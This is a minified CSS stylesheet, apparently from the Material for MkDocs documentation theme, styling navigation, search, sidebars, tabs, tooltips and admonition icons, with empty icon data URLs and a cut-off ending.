.md-nav__toggle:checked~.md-nav__link .md-nav__icon:after,.md-nav__item--nested .md-nav__toggle:indeterminate~.md-nav__link .md-nav__icon:after{transform:rotate(90deg)}.md-nav--lifted>.md-nav__list>.md-nav__item,.md-nav--lifted>.md-nav__list>.md-nav__item--nested,.md-nav--lifted>.md-nav__title{display:none}.md-nav--lifted>.md-nav__list>.md-nav__item--active{display:block;padding:0}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);font-weight:700;margin-top:0;padding:0 .6rem;position:sticky;top:0;z-index:1}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link:not(.md-nav__link--index){pointer-events:none}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link .md-nav__icon{display:none}.md-nav--lifted>.md-nav__list>.md-nav__item>[for]{color:var(--md-default-fg-color--light)}.md-nav--lifted .md-nav[data-md-level="1"]{display:block}[dir=ltr] .md-nav--lifted .md-nav[data-md-level="1"]>.md-nav__list>.md-nav__item{padding-right:.6rem}[dir=rtl] .md-nav--lifted .md-nav[data-md-level="1"]>.md-nav__list>.md-nav__item{padding-left:.6rem}.md-nav--integrated>.md-nav__list>.md-nav__item--active:not(.md-nav__item--nested){padding:0 .6rem}.md-nav--integrated>.md-nav__list>.md-nav__item--active:not(.md-nav__item--nested)>.md-nav__link{padding:0}[dir=ltr] .md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{border-left:.05rem solid var(--md-primary-fg-color)}[dir=rtl] .md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{border-right:.05rem solid var(--md-primary-fg-color)}.md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{display:block;margin-bottom:1.25em}.md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary>.md-nav__title{display:none}}:root{--md-search-result-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-search{position:relative}@media screen and (min-width:60em){.md-search{padding:.2rem 0}}.no-js .md-search{display:none}.md-search__overlay{opacity:0;z-index:1}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__overlay{left:-2.2rem}[dir=rtl] .md-search__overlay{right:-2.2rem}.md-search__overlay{background-color:var(--md-default-bg-color);border-radius:1rem;height:2rem;overflow:hidden;pointer-events:none;position:absolute;top:-1rem;transform-origin:center;transition:transform .3s .1s,opacity .2s .2s;width:2rem}[data-md-toggle=search]:checked~.md-header .md-search__overlay{opacity:1;transition:transform .4s,opacity .1s}}@media screen and (min-width:60em){[dir=ltr] .md-search__overlay{left:0}[dir=rtl] .md-search__overlay{right:0}.md-search__overlay{background-color:#0000008a;cursor:pointer;height:0;position:fixed;top:0;transition:width 0ms .25s,height 0ms .25s,opacity .25s;width:0}[data-md-toggle=search]:checked~.md-header .md-search__overlay{height:200vh;opacity:1;transition:width 0ms,height 0ms,opacity .25s;width:100%}}@media screen and (max-width:29.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(45)}}@media screen and (min-width:30em) and (max-width:44.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(60)}}@media screen and (min-width:45em) and (max-width:59.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(75)}}.md-search__inner{-webkit-backface-visibility:hidden;backface-visibility:hidden}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__inner{left:0}[dir=rtl] .md-search__inner{right:0}.md-search__inner{height:0;opacity:0;overflow:hidden;position:fixed;top:0;transform:translateX(5%);transition:width 0ms .3s,height 0ms .3s,transform .15s cubic-bezier(.4,0,.2,1) .15s,opacity .15s .15s;width:0;z-index:2}[dir=rtl] .md-search__inner{transform:translateX(-5%)}[data-md-toggle=search]:checked~.md-header .md-search__inner{height:100%;opacity:1;transform:translateX(0);transition:width 0ms 0ms,height 0ms 0ms,transform .15s cubic-bezier(.1,.7,.1,1) .15s,opacity .15s .15s;width:100%}}@media screen and (min-width:60em){[dir=ltr] .md-search__inner{float:right}[dir=rtl] .md-search__inner{float:left}.md-search__inner{padding:.1rem 0;position:relative;transition:width .25s cubic-bezier(.1,.7,.1,1);width:11.7rem}}@media screen and (min-width:60em) and (max-width:76.1875em){[data-md-toggle=search]:checked~.md-header .md-search__inner{width:23.4rem}}@media screen and (min-width:76.25em){[data-md-toggle=search]:checked~.md-header .md-search__inner{width:34.4rem}}.md-search__form{background-color:var(--md-default-bg-color);box-shadow:0 0 .6rem #0000;height:2.4rem;position:relative;transition:color .25s,background-color .25s;z-index:2}@media screen and (min-width:60em){.md-search__form{background-color:#00000042;border-radius:.1rem;height:1.8rem}.md-search__form:hover{background-color:#ffffff1f}}[data-md-toggle=search]:checked~.md-header .md-search__form{background-color:var(--md-default-bg-color);border-radius:.1rem .1rem 0 0;box-shadow:0 0 .6rem #00000012;color:var(--md-default-fg-color)}[dir=ltr] .md-search__input{padding-left:3.6rem;padding-right:2.2rem}[dir=rtl] .md-search__input{padding-left:2.2rem;padding-right:3.6rem}.md-search__input{background:#0000;font-size:.9rem;height:100%;position:relative;text-overflow:ellipsis;width:100%;z-index:2}.md-search__input::placeholder{transition:color .25s}.md-search__input::placeholder,.md-search__input~.md-search__icon{color:var(--md-default-fg-color--light)}.md-search__input::-ms-clear{display:none}@media screen and (max-width:59.9375em){.md-search__input{font-size:.9rem;height:2.4rem;width:100%}}@media screen and (min-width:60em){[dir=ltr] .md-search__input{padding-left:2.2rem}[dir=rtl] .md-search__input{padding-right:2.2rem}.md-search__input{color:inherit;font-size:.8rem}.md-search__input::placeholder{color:var(--md-primary-bg-color--light)}.md-search__input+.md-search__icon{color:var(--md-primary-bg-color)}[data-md-toggle=search]:checked~.md-header .md-search__input{text-overflow:clip}[data-md-toggle=search]:checked~.md-header .md-search__input+.md-search__icon{color:var(--md-default-fg-color--light)}[data-md-toggle=search]:checked~.md-header .md-search__input::placeholder{color:#0000}}.md-search__icon{cursor:pointer;display:inline-block;height:1.2rem;transition:color .25s,opacity .25s;width:1.2rem}.md-search__icon:hover{opacity:.7}[dir=ltr] .md-search__icon[for=__search]{left:.5rem}[dir=rtl] .md-search__icon[for=__search]{right:.5rem}.md-search__icon[for=__search]{position:absolute;top:.3rem;z-index:2}[dir=rtl] .md-search__icon[for=__search] svg{transform:scaleX(-1)}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__icon[for=__search]{left:.8rem}[dir=rtl] .md-search__icon[for=__search]{right:.8rem}.md-search__icon[for=__search]{top:.6rem}.md-search__icon[for=__search] svg:first-child{display:none}}@media screen and (min-width:60em){.md-search__icon[for=__search]{pointer-events:none}.md-search__icon[for=__search] svg:last-child{display:none}}[dir=ltr] .md-search__options{right:.5rem}[dir=rtl] .md-search__options{left:.5rem}.md-search__options{pointer-events:none;position:absolute;top:.3rem;z-index:2}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__options{right:.8rem}[dir=rtl] .md-search__options{left:.8rem}.md-search__options{top:.6rem}}[dir=ltr] .md-search__options>.md-icon{margin-left:.2rem}[dir=rtl] .md-search__options>.md-icon{margin-right:.2rem}.md-search__options>.md-icon{color:var(--md-default-fg-color--light);opacity:0;transform:scale(.75);transition:transform .15s cubic-bezier(.1,.7,.1,1),opacity .15s}.md-search__options>.md-icon:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}[data-md-toggle=search]:checked~.md-header .md-search__input:valid~.md-search__options>.md-icon{opacity:1;pointer-events:auto;transform:scale(1)}[data-md-toggle=search]:checked~.md-header .md-search__input:valid~.md-search__options>.md-icon:hover{opacity:.7}[dir=ltr] .md-search__suggest{padding-left:3.6rem;padding-right:2.2rem}[dir=rtl] .md-search__suggest{padding-left:2.2rem;padding-right:3.6rem}.md-search__suggest{align-items:center;color:var(--md-default-fg-color--lighter);display:flex;font-size:.9rem;height:100%;opacity:0;position:absolute;top:0;transition:opacity 50ms;white-space:nowrap;width:100%}@media screen and (min-width:60em){[dir=ltr] .md-search__suggest{padding-left:2.2rem}[dir=rtl] .md-search__suggest{padding-right:2.2rem}.md-search__suggest{font-size:.8rem}}[data-md-toggle=search]:checked~.md-header .md-search__suggest{opacity:1;transition:opacity .3s .1s}[dir=ltr] .md-search__output{border-bottom-left-radius:.1rem}[dir=ltr] .md-search__output,[dir=rtl] .md-search__output{border-bottom-right-radius:.1rem}[dir=rtl] .md-search__output{border-bottom-left-radius:.1rem}.md-search__output{overflow:hidden;position:absolute;width:100%;z-index:1}@media screen and (max-width:59.9375em){.md-search__output{bottom:0;top:2.4rem}}@media screen and (min-width:60em){.md-search__output{opacity:0;top:1.9rem;transition:opacity .4s}[data-md-toggle=search]:checked~.md-header .md-search__output{box-shadow:var(--md-shadow-z3);opacity:1}}.md-search__scrollwrap{-webkit-backface-visibility:hidden;backface-visibility:hidden;background-color:var(--md-default-bg-color);height:100%;overflow-y:auto;touch-action:pan-y}@media (-webkit-max-device-pixel-ratio:1),(max-resolution:1dppx){.md-search__scrollwrap{transform:translateZ(0)}}@media screen and (min-width:60em) and (max-width:76.1875em){.md-search__scrollwrap{width:23.4rem}}@media screen and (min-width:76.25em){.md-search__scrollwrap{width:34.4rem}}@media screen and (min-width:60em){.md-search__scrollwrap{max-height:0;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin}[data-md-toggle=search]:checked~.md-header .md-search__scrollwrap{max-height:75vh}.md-search__scrollwrap:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-search__scrollwrap::-webkit-scrollbar{height:.2rem;width:.2rem}.md-search__scrollwrap::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-search__scrollwrap::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}}.md-search-result{color:var(--md-default-fg-color);word-break:break-word}.md-search-result__meta{background-color:var(--md-default-fg-color--lightest);color:var(--md-default-fg-color--light);font-size:.64rem;line-height:1.8rem;padding:0 .8rem;scroll-snap-align:start}@media screen and (min-width:60em){[dir=ltr] .md-search-result__meta{padding-left:2.2rem}[dir=rtl] .md-search-result__meta{padding-right:2.2rem}}.md-search-result__list{list-style:none;margin:0;padding:0;-webkit-user-select:none;-moz-user-select:none;user-select:none}.md-search-result__item{box-shadow:0 -.05rem var(--md-default-fg-color--lightest)}.md-search-result__item:first-child{box-shadow:none}.md-search-result__link{display:block;outline:none;scroll-snap-align:start;transition:background-color .25s}.md-search-result__link:focus,.md-search-result__link:hover{background-color:var(--md-accent-fg-color--transparent)}.md-search-result__link:last-child p:last-child{margin-bottom:.6rem}.md-search-result__more>summary{cursor:pointer;display:block;outline:none;position:sticky;scroll-snap-align:start;top:0;z-index:1}.md-search-result__more>summary::marker{display:none}.md-search-result__more>summary::-webkit-details-marker{display:none}.md-search-result__more>summary>div{color:var(--md-typeset-a-color);font-size:.64rem;padding:.75em .8rem;transition:color .25s,background-color .25s}@media screen and (min-width:60em){[dir=ltr] .md-search-result__more>summary>div{padding-left:2.2rem}[dir=rtl] .md-search-result__more>summary>div{padding-right:2.2rem}}.md-search-result__more>summary:focus>div,.md-search-result__more>summary:hover>div{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}.md-search-result__more[open]>summary{background-color:var(--md-default-bg-color)}.md-search-result__article{overflow:hidden;padding:0 .8rem;position:relative}@media screen and (min-width:60em){[dir=ltr] .md-search-result__article{padding-left:2.2rem}[dir=rtl] .md-search-result__article{padding-right:2.2rem}}[dir=ltr] .md-search-result__icon{left:0}[dir=rtl] .md-search-result__icon{right:0}.md-search-result__icon{color:var(--md-default-fg-color--light);height:1.2rem;margin:.5rem;position:absolute;width:1.2rem}@media screen and (max-width:59.9375em){.md-search-result__icon{display:none}}.md-search-result__icon:after{background-color:currentcolor;content:"";display:inline-block;height:100%;-webkit-mask-image:var(--md-search-result-icon);mask-image:var(--md-search-result-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}[dir=rtl] .md-search-result__icon:after{transform:scaleX(-1)}.md-search-result .md-typeset{color:var(--md-default-fg-color--light);font-size:.64rem;line-height:1.6}.md-search-result .md-typeset h1{color:var(--md-default-fg-color);font-size:.8rem;font-weight:400;line-height:1.4;margin:.55rem 0}.md-search-result .md-typeset h1 mark{text-decoration:none}.md-search-result .md-typeset h2{color:var(--md-default-fg-color);font-size:.64rem;font-weight:700;line-height:1.6;margin:.5em 0}.md-search-result .md-typeset h2 mark{text-decoration:none}.md-search-result__terms{color:var(--md-default-fg-color);display:block;font-size:.64rem;font-style:italic;margin:.5em 0}.md-search-result mark{background-color:initial;color:var(--md-accent-fg-color);text-decoration:underline}.md-select{position:relative;z-index:1}.md-select__inner{background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);left:50%;margin-top:.2rem;max-height:0;opacity:0;position:absolute;top:calc(100% - .2rem);transform:translate3d(-50%,.3rem,0);transition:transform .25s 375ms,opacity .25s .25s,max-height 0ms .5s}.md-select:focus-within .md-select__inner,.md-select:hover .md-select__inner{max-height:10rem;opacity:1;transform:translate3d(-50%,0,0);transition:transform .25s cubic-bezier(.1,.7,.1,1),opacity .25s,max-height 0ms}.md-select__inner:after{border-bottom:.2rem solid #0000;border-bottom-color:var(--md-default-bg-color);border-left:.2rem solid #0000;border-right:.2rem solid #0000;border-top:0;content:"";height:0;left:50%;margin-left:-.2rem;margin-top:-.2rem;position:absolute;top:0;width:0}.md-select__list{border-radius:.1rem;font-size:.8rem;list-style-type:none;margin:0;max-height:inherit;overflow:auto;padding:0}.md-select__item{line-height:1.8rem}[dir=ltr] .md-select__link{padding-left:.6rem;padding-right:1.2rem}[dir=rtl] .md-select__link{padding-left:1.2rem;padding-right:.6rem}.md-select__link{cursor:pointer;display:block;outline:none;scroll-snap-align:start;transition:background-color .25s,color .25s;width:100%}.md-select__link:focus,.md-select__link:hover{color:var(--md-accent-fg-color)}.md-select__link:focus{background-color:var(--md-default-fg-color--lightest)}.md-sidebar{align-self:flex-start;flex-shrink:0;padding:1.2rem 0;position:sticky;top:2.4rem;width:12.1rem}@media print{.md-sidebar{display:none}}@media screen and (max-width:76.1875em){[dir=ltr] .md-sidebar--primary{left:-12.1rem}[dir=rtl] .md-sidebar--primary{right:-12.1rem}.md-sidebar--primary{background-color:var(--md-default-bg-color);display:block;height:100%;position:fixed;top:0;transform:translateX(0);transition:transform .25s cubic-bezier(.4,0,.2,1),box-shadow .25s;width:12.1rem;z-index:5}[data-md-toggle=drawer]:checked~.md-container .md-sidebar--primary{box-shadow:var(--md-shadow-z3);transform:translateX(12.1rem)}[dir=rtl] [data-md-toggle=drawer]:checked~.md-container .md-sidebar--primary{transform:translateX(-12.1rem)}.md-sidebar--primary .md-sidebar__scrollwrap{bottom:0;left:0;margin:0;overflow:hidden;position:absolute;right:0;scroll-snap-type:none;top:0}}@media screen and (min-width:76.25em){.md-sidebar{height:0}.no-js .md-sidebar{height:auto}.md-header--lifted~.md-container .md-sidebar{top:4.8rem}}.md-sidebar--secondary{display:none;order:2}@media screen and (min-width:60em){.md-sidebar--secondary{height:0}.no-js .md-sidebar--secondary{height:auto}.md-sidebar--secondary:not([hidden]){display:block}.md-sidebar--secondary .md-sidebar__scrollwrap{touch-action:pan-y}}.md-sidebar__scrollwrap{scrollbar-gutter:stable;-webkit-backface-visibility:hidden;backface-visibility:hidden;margin:0 .2rem;overflow-y:auto;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin}.md-sidebar__scrollwrap::-webkit-scrollbar{height:.2rem;width:.2rem}.md-sidebar__scrollwrap:focus-within,.md-sidebar__scrollwrap:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-sidebar__scrollwrap:focus-within::-webkit-scrollbar-thumb,.md-sidebar__scrollwrap:hover::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-sidebar__scrollwrap:focus-within::-webkit-scrollbar-thumb:hover,.md-sidebar__scrollwrap:hover::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}@supports selector(::-webkit-scrollbar){.md-sidebar__scrollwrap{scrollbar-gutter:auto}[dir=ltr] .md-sidebar__inner{padding-right:calc(100% - 11.5rem)}[dir=rtl] .md-sidebar__inner{padding-left:calc(100% - 11.5rem)}}@media screen and (max-width:76.1875em){.md-overlay{background-color:#0000008a;height:0;opacity:0;position:fixed;top:0;transition:width 0ms .25s,height 0ms .25s,opacity .25s;width:0;z-index:5}[data-md-toggle=drawer]:checked~.md-overlay{height:100%;opacity:1;transition:width 0ms,height 0ms,opacity .25s;width:100%}}@keyframes facts{0%{height:0}to{height:.65rem}}@keyframes fact{0%{opacity:0;transform:translateY(100%)}50%{opacity:0}to{opacity:1;transform:translateY(0)}}:root{--md-source-forks-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-repositories-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-stars-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-version-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-source{-webkit-backface-visibility:hidden;backface-visibility:hidden;display:block;font-size:.65rem;line-height:1.2;outline-color:var(--md-accent-fg-color);transition:opacity .25s;white-space:nowrap}.md-source:hover{opacity:.7}.md-source__icon{display:inline-block;height:2.4rem;vertical-align:middle;width:2rem}[dir=ltr] .md-source__icon svg{margin-left:.6rem}[dir=rtl] .md-source__icon svg{margin-right:.6rem}.md-source__icon svg{margin-top:.6rem}[dir=ltr] .md-source__icon+.md-source__repository{padding-left:2rem}[dir=rtl] .md-source__icon+.md-source__repository{padding-right:2rem}[dir=ltr] .md-source__icon+.md-source__repository{margin-left:-2rem}[dir=rtl] .md-source__icon+.md-source__repository{margin-right:-2rem}[dir=ltr] .md-source__repository{margin-left:.6rem}[dir=rtl] .md-source__repository{margin-right:.6rem}.md-source__repository{display:inline-block;max-width:calc(100% - 1.2rem);overflow:hidden;text-overflow:ellipsis;vertical-align:middle}.md-source__facts{display:flex;font-size:.55rem;gap:.4rem;list-style-type:none;margin:.1rem 0 0;opacity:.75;overflow:hidden;padding:0;width:100%}.md-source__repository--active .md-source__facts{animation:facts .25s ease-in}.md-source__fact{overflow:hidden;text-overflow:ellipsis}.md-source__repository--active .md-source__fact{animation:fact .4s ease-out}[dir=ltr] .md-source__fact:before{margin-right:.1rem}[dir=rtl] .md-source__fact:before{margin-left:.1rem}.md-source__fact:before{background-color:currentcolor;content:"";display:inline-block;height:.6rem;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;vertical-align:text-top;width:.6rem}.md-source__fact:nth-child(1n+2){flex-shrink:0}.md-source__fact--version:before{-webkit-mask-image:var(--md-source-version-icon);mask-image:var(--md-source-version-icon)}.md-source__fact--stars:before{-webkit-mask-image:var(--md-source-stars-icon);mask-image:var(--md-source-stars-icon)}.md-source__fact--forks:before{-webkit-mask-image:var(--md-source-forks-icon);mask-image:var(--md-source-forks-icon)}.md-source__fact--repositories:before{-webkit-mask-image:var(--md-source-repositories-icon);mask-image:var(--md-source-repositories-icon)}.md-tabs{background-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color);display:block;line-height:1.3;overflow:auto;width:100%;z-index:3}@media print{.md-tabs{display:none}}@media screen and (max-width:76.1875em){.md-tabs{display:none}}.md-tabs[hidden]{pointer-events:none}[dir=ltr] .md-tabs__list{margin-left:.2rem}[dir=rtl] .md-tabs__list{margin-right:.2rem}.md-tabs__list{contain:content;list-style:none;margin:0;overflow:auto;padding:0;scrollbar-width:none;white-space:nowrap}.md-tabs__list::-webkit-scrollbar{display:none}.md-tabs__item{display:inline-block;height:2.4rem;padding-left:.6rem;padding-right:.6rem}.md-tabs__link{-webkit-backface-visibility:hidden;backface-visibility:hidden;display:block;font-size:.7rem;margin-top:.8rem;opacity:.7;outline-color:var(--md-accent-fg-color);outline-offset:.2rem;transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .25s}.md-tabs__link--active,.md-tabs__link:focus,.md-tabs__link:hover{color:inherit;opacity:1}.md-tabs__item:nth-child(2) .md-tabs__link{transition-delay:20ms}.md-tabs__item:nth-child(3) .md-tabs__link{transition-delay:40ms}.md-tabs__item:nth-child(4) .md-tabs__link{transition-delay:60ms}.md-tabs__item:nth-child(5) .md-tabs__link{transition-delay:80ms}.md-tabs__item:nth-child(6) .md-tabs__link{transition-delay:.1s}.md-tabs__item:nth-child(7) .md-tabs__link{transition-delay:.12s}.md-tabs__item:nth-child(8) .md-tabs__link{transition-delay:.14s}.md-tabs__item:nth-child(9) .md-tabs__link{transition-delay:.16s}.md-tabs__item:nth-child(10) .md-tabs__link{transition-delay:.18s}.md-tabs__item:nth-child(11) .md-tabs__link{transition-delay:.2s}.md-tabs__item:nth-child(12) .md-tabs__link{transition-delay:.22s}.md-tabs__item:nth-child(13) .md-tabs__link{transition-delay:.24s}.md-tabs__item:nth-child(14) .md-tabs__link{transition-delay:.26s}.md-tabs__item:nth-child(15) .md-tabs__link{transition-delay:.28s}.md-tabs__item:nth-child(16) .md-tabs__link{transition-delay:.3s}.md-tabs[hidden] .md-tabs__link{opacity:0;transform:translateY(50%);transition:transform 0ms .1s,opacity .1s}:root{--md-tag-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .md-tags{margin-bottom:.75em;margin-top:-.125em}[dir=ltr] .md-typeset .md-tag{margin-right:.5em}[dir=rtl] .md-typeset .md-tag{margin-left:.5em}.md-typeset .md-tag{background:var(--md-default-fg-color--lightest);border-radius:2.4rem;display:inline-block;font-size:.64rem;font-weight:700;letter-spacing:normal;line-height:1.6;margin-bottom:.5em;padding:.3125em .9375em;vertical-align:middle}.md-typeset .md-tag[href]{-webkit-tap-highlight-color:transparent;color:inherit;outline:none;transition:color 125ms,background-color 125ms}.md-typeset .md-tag[href]:focus,.md-typeset .md-tag[href]:hover{background-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}[id]>.md-typeset .md-tag{vertical-align:text-top}.md-typeset .md-tag-icon:before{background-color:var(--md-default-fg-color--lighter);content:"";display:inline-block;height:1.2em;margin-right:.4em;-webkit-mask-image:var(--md-tag-icon);mask-image:var(--md-tag-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color 125ms;vertical-align:text-bottom;width:1.2em}.md-typeset .md-tag-icon[href]:focus:before,.md-typeset .md-tag-icon[href]:hover:before{background-color:var(--md-accent-bg-color)}@keyframes pulse{0%{box-shadow:0 0 0 0 var(--md-default-fg-color--lightest);transform:scale(.95)}75%{box-shadow:0 0 0 .625em #0000;transform:scale(1)}to{box-shadow:0 0 0 0 #0000;transform:scale(.95)}}:root{--md-tooltip-width:20rem}.md-tooltip{-webkit-backface-visibility:hidden;backface-visibility:hidden;background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);font-family:var(--md-text-font-family);left:clamp(var(--md-tooltip-0,0rem) + .8rem,var(--md-tooltip-x),100vw + var(--md-tooltip-0,0rem) + .8rem - var(--md-tooltip-width) - 2 * .8rem);max-width:calc(100vw - 1.6rem);opacity:0;position:absolute;top:var(--md-tooltip-y);transform:translateY(-.4rem);transition:transform 0ms .25s,opacity .25s,z-index .25s;width:var(--md-tooltip-width);z-index:0}.md-tooltip--active{opacity:1;transform:translateY(0);transition:transform .25s cubic-bezier(.1,.7,.1,1),opacity .25s,z-index 0ms;z-index:2}.focus-visible>.md-tooltip,.md-tooltip:target{outline:var(--md-accent-fg-color) auto}.md-tooltip__inner{font-size:.64rem;padding:.8rem}.md-tooltip__inner.md-typeset>:first-child{margin-top:0}.md-tooltip__inner.md-typeset>:last-child{margin-bottom:0}.md-annotation{font-weight:400;outline:none;white-space:normal}[dir=rtl] .md-annotation{direction:rtl}.md-annotation:not([hidden]){display:inline-block;line-height:1.325}.md-annotation__index{cursor:pointer;font-family:var(--md-code-font-family);font-size:.85em;margin:0 1ch;outline:none;position:relative;-webkit-user-select:none;-moz-user-select:none;user-select:none;z-index:0}.md-annotation .md-annotation__index{color:#fff;transition:z-index .25s}.md-annotation .md-annotation__index:focus,.md-annotation .md-annotation__index:hover{color:#fff}.md-annotation__index:after{background-color:var(--md-default-fg-color--lighter);border-radius:2ch;content:"";height:2.2ch;left:-.125em;margin:0 -.4ch;padding:0 .4ch;position:absolute;top:0;transition:color .25s,background-color .25s;width:calc(100% + 1.2ch);width:max(2.2ch,100% + 1.2ch);z-index:-1}@media not all and (prefers-reduced-motion){[data-md-visible]>.md-annotation__index:after{animation:pulse 2s infinite}}.md-tooltip--active+.md-annotation__index:after{animation:none;transition:color .25s,background-color .25s}code .md-annotation__index{font-family:var(--md-code-font-family);font-size:inherit}.md-tooltip--active+.md-annotation__index,:hover>.md-annotation__index{color:var(--md-accent-bg-color)}.md-tooltip--active+.md-annotation__index:after,:hover>.md-annotation__index:after{background-color:var(--md-accent-fg-color)}.md-tooltip--active+.md-annotation__index{animation:none;transition:none;z-index:2}.md-annotation__index [data-md-annotation-id]{display:inline-block;line-height:90%}.md-annotation__index [data-md-annotation-id]:before{content:attr(data-md-annotation-id);display:inline-block;padding-bottom:.1em;transform:scale(1.15);transition:transform .4s cubic-bezier(.1,.7,.1,1);vertical-align:.065em}@media not print{.md-annotation__index [data-md-annotation-id]:before{content:"+"}:focus-within>.md-annotation__index [data-md-annotation-id]:before{transform:scale(1.25) rotate(45deg)}}[dir=ltr] .md-top{margin-left:50%}[dir=rtl] .md-top{margin-right:50%}.md-top{background-color:var(--md-default-bg-color);border-radius:1.6rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color--light);cursor:pointer;display:block;font-size:.7rem;outline:none;padding:.4rem .8rem;position:fixed;top:3.2rem;transform:translate(-50%);transition:color 125ms,background-color 125ms,transform 125ms cubic-bezier(.4,0,.2,1),opacity 125ms;z-index:2}@media print{.md-top{display:none}}[dir=rtl] .md-top{transform:translate(50%)}.md-top[hidden]{opacity:0;pointer-events:none;transform:translate(-50%,.2rem);transition-duration:0ms}[dir=rtl] .md-top[hidden]{transform:translate(50%,.2rem)}.md-top:focus,.md-top:hover{background-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}.md-top svg{display:inline-block;vertical-align:-.5em}@keyframes hoverfix{0%{pointer-events:none}}:root{--md-version-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-version{flex-shrink:0;font-size:.8rem;height:2.4rem}[dir=ltr] .md-version__current{margin-left:1.4rem;margin-right:.4rem}[dir=rtl] .md-version__current{margin-left:.4rem;margin-right:1.4rem}.md-version__current{color:inherit;cursor:pointer;outline:none;position:relative;top:.05rem}[dir=ltr] .md-version__current:after{margin-left:.4rem}[dir=rtl] .md-version__current:after{margin-right:.4rem}.md-version__current:after{background-color:currentcolor;content:"";display:inline-block;height:.6rem;-webkit-mask-image:var(--md-version-icon);mask-image:var(--md-version-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:.4rem}.md-version__list{background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);list-style-type:none;margin:.2rem .8rem;max-height:0;opacity:0;overflow:auto;padding:0;position:absolute;scroll-snap-type:y mandatory;top:.15rem;transition:max-height 0ms .5s,opacity .25s .25s;z-index:3}.md-version:focus-within .md-version__list,.md-version:hover .md-version__list{max-height:10rem;opacity:1;transition:max-height 0ms,opacity .25s}@media (pointer:coarse){.md-version:hover .md-version__list{animation:hoverfix .25s forwards}.md-version:focus-within .md-version__list{animation:none}}.md-version__item{line-height:1.8rem}[dir=ltr] .md-version__link{padding-left:.6rem;padding-right:1.2rem}[dir=rtl] .md-version__link{padding-left:1.2rem;padding-right:.6rem}.md-version__link{cursor:pointer;display:block;outline:none;scroll-snap-align:start;transition:color .25s,background-color .25s;white-space:nowrap;width:100%}.md-version__link:focus,.md-version__link:hover{color:var(--md-accent-fg-color)}.md-version__link:focus{background-color:var(--md-default-fg-color--lightest)}:root{--md-admonition-icon--note:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--abstract:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--info:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--tip:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--success:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--question:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--warning:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--failure:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--danger:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--bug:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--example:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--quote:url('data:image/svg+xml;charset=utf-8,
